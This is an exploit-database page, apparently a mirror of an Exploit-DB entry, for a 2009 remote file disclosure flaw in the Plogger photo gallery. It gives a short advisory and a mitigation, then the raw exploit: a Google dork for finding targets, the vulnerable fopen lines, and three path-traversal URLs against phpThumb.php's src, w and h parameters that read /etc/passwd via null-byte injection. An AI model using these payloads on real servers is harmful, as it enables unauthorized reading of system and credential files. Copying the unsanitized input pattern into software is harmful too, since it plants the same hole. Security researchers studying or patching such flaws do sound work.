header-logo
Suggest Exploit
vendor:
Plogger
by:
Mr.tro0oqy
7,5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: Plogger
Affected Version From: Prior to 1.0.2
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: plogger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Plogger Remote File Disclosure Vulnerability

Plogger is vulnerable to a remote file disclosure vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. By manipulating the 'src' and 'w' or 'h' parameters, an attacker can read arbitrary files from the server. This vulnerability affects Plogger versions prior to 1.0.2.

Mitigation:

Upgrade to Plogger version 1.0.2 or later.
Source

Exploit-DB raw data:

# Plogger Remote File Disclosure Vulnerability
# http://www.plogger.org/
# dork : Powered by Plogger!
# author: Mr.tro0oqy (yemeni hacker) 
# email : t.4@windowslive.com

exp : 

Line 117:   if ($fp_source = @fopen($_GET['src'],'rb'))

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00

Line 41: 	$_GET['w'] = $matches[1];
Line 42: 	$_GET['h'] = $matches[2];

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?h=../../../../../../../../../etc/passwd%00


greetz : all muslems (ramadan kreem)

Navigation

Suggest Exploit

Services By CQR